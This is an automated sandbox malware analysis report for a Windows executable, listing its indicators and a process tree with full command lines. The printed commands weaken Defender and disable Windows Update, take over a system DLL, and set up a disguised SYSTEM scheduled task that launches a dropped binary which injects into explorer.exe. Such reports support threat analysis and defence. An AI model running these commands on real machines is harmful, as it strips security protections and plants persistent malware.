f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

Analysis

max time kernel
151s
max time network
146s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
29-08-2022 03:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

hafuk.exe
Size

4.3MB
MD5

e0ec197ba6e02af435a5230b8f4331b3
SHA1

7aada797f2a5f1ff58467923f47d6d31db33fc1a
SHA256

f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed
SHA512

46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770
SSDEEP

98304:wEH7zDMeBfte//fxvbNOKAJmFxPVGp3X/G3DvJFvxzG99K:wEPDDBfKxvQKAJmFxPVG1/GlFv0XK

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Drops file in Drivers directory 2 IoCs

Processes:

hafuk.exeupdaterchr.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	hafuk.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updaterchr.exe

Executes dropped EXE 2 IoCs

Processes:

updaterchr.exeexplorer.exe

pid process

848 updaterchr.exe
556 explorer.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

392 icacls.exe
1944 takeown.exe
944 icacls.exe
1568 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

860 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1568 takeown.exe
392 icacls.exe
1944 takeown.exe
944 icacls.exe

pid	process
848	updaterchr.exe
556	explorer.exe

pid	process
392	icacls.exe
1944	takeown.exe
944	icacls.exe
1568	takeown.exe

pid	process
860	taskeng.exe

pid	process
1568	takeown.exe
392	icacls.exe
1944	takeown.exe
944	icacls.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exeupdaterchr.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\F90F.tmp	updaterchr.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

updaterchr.exe

description pid process target process

PID 848 set thread context of 556 848 updaterchr.exe explorer.exe

description	pid	process	target process
PID 848 set thread context of 556	848	updaterchr.exe	explorer.exe

Drops file in Program Files directory 3 IoCs

Processes:

hafuk.exeupdaterchr.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updaterchr.exe	hafuk.exe
File opened for modification	C:\Program Files\Google\Chrome\updaterchr.exe	hafuk.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updaterchr.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

316 sc.exe
1076 sc.exe
1916 sc.exe
1808 sc.exe
1564 sc.exe
1488 sc.exe
1120 sc.exe
2016 sc.exe
1028 sc.exe
1932 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1808 schtasks.exe
1776 schtasks.exe

pid	process
316	sc.exe
1076	sc.exe
1916	sc.exe
1808	sc.exe
1564	sc.exe
1488	sc.exe
1120	sc.exe
2016	sc.exe
1028	sc.exe
1932	sc.exe

pid	process
1808	schtasks.exe
1776	schtasks.exe

Modifies data under HKEY_USERS 9 IoCs

Processes:

powershell.exeexplorer.exeupdaterchr.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 1058003c57bbd801	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	explorer.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	updaterchr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	updaterchr.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
972	reg.exe
1620	reg.exe
1588	reg.exe
844	reg.exe
1016	reg.exe
1784	reg.exe
1196	reg.exe
1252	reg.exe
568	reg.exe
392	reg.exe
1320	reg.exe
548	reg.exe
1768	reg.exe
1008	reg.exe
1596	reg.exe
1196	reg.exe
1460	reg.exe
1000	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exehafuk.exepowershell.exeexplorer.exe

pid	process
984	powershell.exe
1048	hafuk.exe
1244	powershell.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
460

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exehafuk.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeexplorer.exeupdaterchr.exe

description	pid	process
Token: SeDebugPrivilege	984	powershell.exe
Token: SeShutdownPrivilege	1684	powercfg.exe
Token: SeShutdownPrivilege	1860	powercfg.exe
Token: SeShutdownPrivilege	1948	powercfg.exe
Token: SeShutdownPrivilege	2000	powercfg.exe
Token: SeTakeOwnershipPrivilege	1568	takeown.exe
Token: SeDebugPrivilege	1048	hafuk.exe
Token: SeDebugPrivilege	1244	powershell.exe
Token: SeShutdownPrivilege	1136	powercfg.exe
Token: SeShutdownPrivilege	1344	powercfg.exe
Token: SeShutdownPrivilege	1940	powercfg.exe
Token: SeShutdownPrivilege	1044	powercfg.exe
Token: SeTakeOwnershipPrivilege	1944	takeown.exe
Token: SeLockMemoryPrivilege	556	explorer.exe
Token: SeDebugPrivilege	848	updaterchr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

hafuk.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1048 wrote to memory of 984	1048	hafuk.exe	powershell.exe
PID 1048 wrote to memory of 984	1048	hafuk.exe	powershell.exe
PID 1048 wrote to memory of 984	1048	hafuk.exe	powershell.exe
PID 1048 wrote to memory of 640	1048	hafuk.exe	cmd.exe
PID 1048 wrote to memory of 640	1048	hafuk.exe	cmd.exe
PID 1048 wrote to memory of 640	1048	hafuk.exe	cmd.exe
PID 1048 wrote to memory of 1696	1048	hafuk.exe	cmd.exe
PID 1048 wrote to memory of 1696	1048	hafuk.exe	cmd.exe
PID 1048 wrote to memory of 1696	1048	hafuk.exe	cmd.exe
PID 640 wrote to memory of 1120	640	cmd.exe	sc.exe
PID 640 wrote to memory of 1120	640	cmd.exe	sc.exe
PID 640 wrote to memory of 1120	640	cmd.exe	sc.exe
PID 1696 wrote to memory of 1684	1696	cmd.exe	powercfg.exe
PID 1696 wrote to memory of 1684	1696	cmd.exe	powercfg.exe
PID 1696 wrote to memory of 1684	1696	cmd.exe	powercfg.exe
PID 1048 wrote to memory of 676	1048	hafuk.exe	cmd.exe
PID 1048 wrote to memory of 676	1048	hafuk.exe	cmd.exe
PID 1048 wrote to memory of 676	1048	hafuk.exe	cmd.exe
PID 640 wrote to memory of 316	640	cmd.exe	sc.exe
PID 640 wrote to memory of 316	640	cmd.exe	sc.exe
PID 640 wrote to memory of 316	640	cmd.exe	sc.exe
PID 640 wrote to memory of 1076	640	cmd.exe	sc.exe
PID 640 wrote to memory of 1076	640	cmd.exe	sc.exe
PID 640 wrote to memory of 1076	640	cmd.exe	sc.exe
PID 1696 wrote to memory of 1860	1696	cmd.exe	powercfg.exe
PID 1696 wrote to memory of 1860	1696	cmd.exe	powercfg.exe
PID 1696 wrote to memory of 1860	1696	cmd.exe	powercfg.exe
PID 676 wrote to memory of 1808	676	cmd.exe	schtasks.exe
PID 676 wrote to memory of 1808	676	cmd.exe	schtasks.exe
PID 676 wrote to memory of 1808	676	cmd.exe	schtasks.exe
PID 640 wrote to memory of 1916	640	cmd.exe	sc.exe
PID 640 wrote to memory of 1916	640	cmd.exe	sc.exe
PID 640 wrote to memory of 1916	640	cmd.exe	sc.exe
PID 1696 wrote to memory of 1948	1696	cmd.exe	powercfg.exe
PID 1696 wrote to memory of 1948	1696	cmd.exe	powercfg.exe
PID 1696 wrote to memory of 1948	1696	cmd.exe	powercfg.exe
PID 640 wrote to memory of 2016	640	cmd.exe	sc.exe
PID 640 wrote to memory of 2016	640	cmd.exe	sc.exe
PID 640 wrote to memory of 2016	640	cmd.exe	sc.exe
PID 1696 wrote to memory of 2000	1696	cmd.exe	powercfg.exe
PID 1696 wrote to memory of 2000	1696	cmd.exe	powercfg.exe
PID 1696 wrote to memory of 2000	1696	cmd.exe	powercfg.exe
PID 640 wrote to memory of 1016	640	cmd.exe	reg.exe
PID 640 wrote to memory of 1016	640	cmd.exe	reg.exe
PID 640 wrote to memory of 1016	640	cmd.exe	reg.exe
PID 640 wrote to memory of 548	640	cmd.exe	reg.exe
PID 640 wrote to memory of 548	640	cmd.exe	reg.exe
PID 640 wrote to memory of 548	640	cmd.exe	reg.exe
PID 640 wrote to memory of 972	640	cmd.exe	reg.exe
PID 640 wrote to memory of 972	640	cmd.exe	reg.exe
PID 640 wrote to memory of 972	640	cmd.exe	reg.exe
PID 640 wrote to memory of 1620	640	cmd.exe	reg.exe
PID 640 wrote to memory of 1620	640	cmd.exe	reg.exe
PID 640 wrote to memory of 1620	640	cmd.exe	reg.exe
PID 640 wrote to memory of 1784	640	cmd.exe	reg.exe
PID 640 wrote to memory of 1784	640	cmd.exe	reg.exe
PID 640 wrote to memory of 1784	640	cmd.exe	reg.exe
PID 640 wrote to memory of 1568	640	cmd.exe	takeown.exe
PID 640 wrote to memory of 1568	640	cmd.exe	takeown.exe
PID 640 wrote to memory of 1568	640	cmd.exe	takeown.exe
PID 640 wrote to memory of 392	640	cmd.exe	icacls.exe
PID 640 wrote to memory of 392	640	cmd.exe	icacls.exe
PID 640 wrote to memory of 392	640	cmd.exe	icacls.exe
PID 1048 wrote to memory of 1532	1048	hafuk.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\hafuk.exe
"C:\Users\Admin\AppData\Local\Temp\hafuk.exe"
1⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABvACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB3AGoAeAAjAD4AIABAACgAIAA8ACMAdwBxACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBpAG8AZAB5ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGgAYQBkAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAHcAIwA+AA=="
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:640

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1120

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:316

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1076

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1916

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:2016

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:1016

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:548

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies security service
- Modifies registry key
PID:972

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:1620

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:1784

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:392

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1196

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1460

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1000

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1768

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:1764

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:580

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:1468

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:1684

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:1076

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:1860

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:1952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1696

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1860

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineGNC" /tr "\"C:\Program Files\Google\Chrome\updaterchr.exe\""
2⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineGNC" /tr "\"C:\Program Files\Google\Chrome\updaterchr.exe\""
3⤵
- Creates scheduled task(s)
PID:1808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineGNC"
2⤵
PID:1532

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineGNC"
3⤵
PID:964

C:\Windows\system32\taskeng.exe
taskeng.exe {BDB05479-A54C-4199-8003-58168CEC4DA9} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:860

C:\Program Files\Google\Chrome\updaterchr.exe
"C:\Program Files\Google\Chrome\updaterchr.exe"
2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABvACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB3AGoAeAAjAD4AIABAACgAIAA8ACMAdwBxACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBpAG8AZAB5ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGgAYQBkAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAHcAIwA+AA=="
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1244

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:600

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1808

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1564

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1028

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1932

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1488

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:1252

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:1588

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies registry key
PID:568

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:1008

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:1596

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:944

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:392

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1320

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1196

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:844

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:2004

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:2044

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:1508

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:1804

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1500

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:2012

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:544

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1344

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1044

C:\Windows\System32\cmd.exe
